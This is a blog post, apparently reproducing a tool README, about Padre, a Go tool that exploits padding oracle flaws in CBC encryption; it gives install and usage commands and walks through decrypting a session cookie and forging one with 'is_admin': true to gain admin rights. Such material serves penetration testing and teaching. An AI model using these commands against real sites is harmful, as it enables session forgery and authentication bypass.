Exploitation Tools

Padre: A Powerful Tool for Exploiting Padding Oracle Attacks

Padre is a sophisticated and efficient software tool specifically engineered to leverage the inherent weaknesses in CBC mode encryption through the exploitation of Padding Oracle vulnerabilities. The system incorporates concurrent operations to optimize the process of decryption and encryption of user-defined data. Additionally, it includes an automated mechanism to identify padding oracles and cipher block lengths. In addition, Padre provides informative guidance in the event of failure scenarios and offers support for versatile encoding specifications, rendering it a resilient option for addressing encryption challenges.

padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption

Features:

  • blazing fast, concurrent implementation
  • decryption of tokens
  • encryption of arbitrary data
  • automatic fingerprinting of padding oracles
  • automatic detection of cipher block length
  • HINTS! if failure occurs during operations, padre will hint you about what can be tweaked to succeed
  • supports tokens in GET/POST parameters, Cookies
  • flexible specification of encoding rules (base64, hex, etc.)

Demo

Installation/Update

  • Fastest way is to download pre-compiled binary for your OS from Latest release
  • Alternatively, if you have Go installed, build from source:
go install github.com/glebarez/padre@latest

Usage scenario

If you find a suspected padding oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre will automatically fingerprint HTTP responses to determine if padding oracle can be confirmed. If server is indeed vulnerable, the provided token will be decrypted into something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

This will spit out another encoded set of encrypted data, perhaps something like below (if base64 used):

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

Impact of padding Oracles

  • disclosing encrypted session information
  • bypassing authentication
  • providing fake tokens that server will trust
  • generally, broad extension of attack surface

Full usage options

Usage: padre [OPTIONS] [INPUT]

INPUT: 
 In decrypt mode: encrypted data
 In encrypt mode: the plaintext to be encrypted
 If not passed, will read from STDIN

 NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
 target URL, use $ character to define token placeholder (if present in URL)

-enc
 Encrypt mode

-err
 Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
 Encoding to apply to binary data. Supported values:
  b64 (standard base64) *default*
  lhex (lowercase hex)

-r
 Additional replacements to apply after encoding binary data. Use odd-length strings, consiting of pairs of characters <OLD><NEW>.
 Example:
  If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
 Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
 String data to perform POST requests. Use $ character to mark token placeholder. 

-ct
 Content-Type for POST requests. If not specified, Content-Type will be determined automatically.
 
-b
 Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
  8
  16 *default*
  32

-p
 Number of parallel HTTP connections established to target server [1-256]
  30 *default*
  
-proxy
 HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Leave a Comment
Share
Published by
Varshini
Tags: cybersecurityinformationsecuritykalilinuxkalilinuxtoolsPadre
2 years ago

Recent Posts

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

2 hours ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

3 hours ago

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

3 hours ago

How to Undo and Redo in Vim or Vi

Vim and Vi are among the most powerful text editors in the Linux world. They…

3 hours ago

How to Unzip and Extract Files in Linux

Working with compressed files is a common task for any Linux user. Whether you are…

3 hours ago

Free Email Lookup Tools and Reverse Email Search Resources

In the digital era, an email address can reveal much more than just a contact…

3 hours ago